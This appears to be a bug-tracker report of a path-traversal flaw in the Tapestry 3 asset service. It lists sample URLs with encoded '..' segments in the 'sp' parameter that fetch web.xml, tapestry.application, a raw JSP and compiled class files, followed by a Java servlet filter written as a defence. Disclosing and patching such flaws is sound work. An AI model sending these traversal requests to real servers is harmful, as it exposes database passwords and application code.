Description
The asset service can be used to view files that should not be visible. This could expose important resources, including database passwords and connection information.
The asset service appears to serve any file reachable relative to the classpath, and the ".." path segment is accepted, so a request can walk up the directory tree and into WEB-INF itself.
Here are some examples. They were tested on a demo application which is often available on the web, but they have been "cleaned" so they no longer point to a real server:
- View the web.xml file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Fweb.xml
- View the tapestry.application file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Ftapestry.application
- View a raw JSP file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2F..%2F404.jsp
- Download a few class files that are part of the application:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FMessageFilter.class
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FBaseEngine.class
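The common thread in the requests above is that the asset service trusts the `sp` parameter as a resource path. A defensive measure an application can deploy without waiting for a framework fix is a servlet filter in front of the `asset` service that normalises the requested path and only lets it through when it stays inside a designated public asset directory. The filter below is an added example written for this issue; it is not Tapestry project code. It assumes the public assets live under `/assets` on the classpath, that the leading `S` in `sp` is Tapestry 3's marker for a String service parameter (inferred from the sample URLs such as `S%2F..%2Fweb.xml`), and that the container has already URL-decoded the parameter once.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Hypothetical filter mapped to the Tapestry application servlet. It rejects
 * asset-service requests whose resource path would resolve outside the public
 * asset directory, so "..", WEB-INF and arbitrary class files are never served.
 */
public class AssetPathFilter implements Filter {

    // Assumed public asset root on the classpath; adjust to the application.
    private static final Path ASSET_ROOT = Paths.get("/assets");

    @Override
    public void init(FilterConfig config) {}

    @Override
    public void destroy() {}

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        if ("asset".equals(request.getParameter("service"))) {
            // getParameter() returns the value with one layer of URL encoding removed.
            String sp = request.getParameter("sp");
            if (!isSafeAssetPath(sp)) {
                response.sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(req, res);
    }

    /**
     * Returns true only when the service parameter names a file strictly inside
     * ASSET_ROOT after normalisation. The leading 'S' is assumed to be the
     * Tapestry 3 type marker for a String parameter.
     */
    static boolean isSafeAssetPath(String sp) {
        if (sp == null || sp.length() < 2 || sp.charAt(0) != 'S') {
            return false;
        }
        String raw = sp.substring(1);
        // Refuse a second encoding layer, backslashes and NUL bytes before normalising,
        // so the check sees the same string the asset service would.
        if (raw.contains("%") || raw.contains("\\") || raw.indexOf('\0') >= 0) {
            return false;
        }
        // normalize() collapses "." and ".." segments; "/../web.xml" becomes "/web.xml",
        // "/assets/../../WEB-INF/web.xml" becomes "/WEB-INF/web.xml", neither under /assets.
        Path requested = Paths.get(raw).normalize();
        return requested.isAbsolute()
                && requested.startsWith(ASSET_ROOT)
                && !requested.equals(ASSET_ROOT);
    }
}
```

Because `Path.startsWith` compares whole path components, `/assetsfoo/x` does not pass as a child of `/assets`. The filter deliberately works on the normalised form rather than searching for the literal string `..`, since a substring check would still let `/org/appfuse/web/BaseEngine.class` through; the allow-listed root is what blocks the class-file downloads shown above.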
Issue Links
- is a clone of TAPESTRY-278 "Tapestry 3.0.2 asset service has security flaw" (Closed)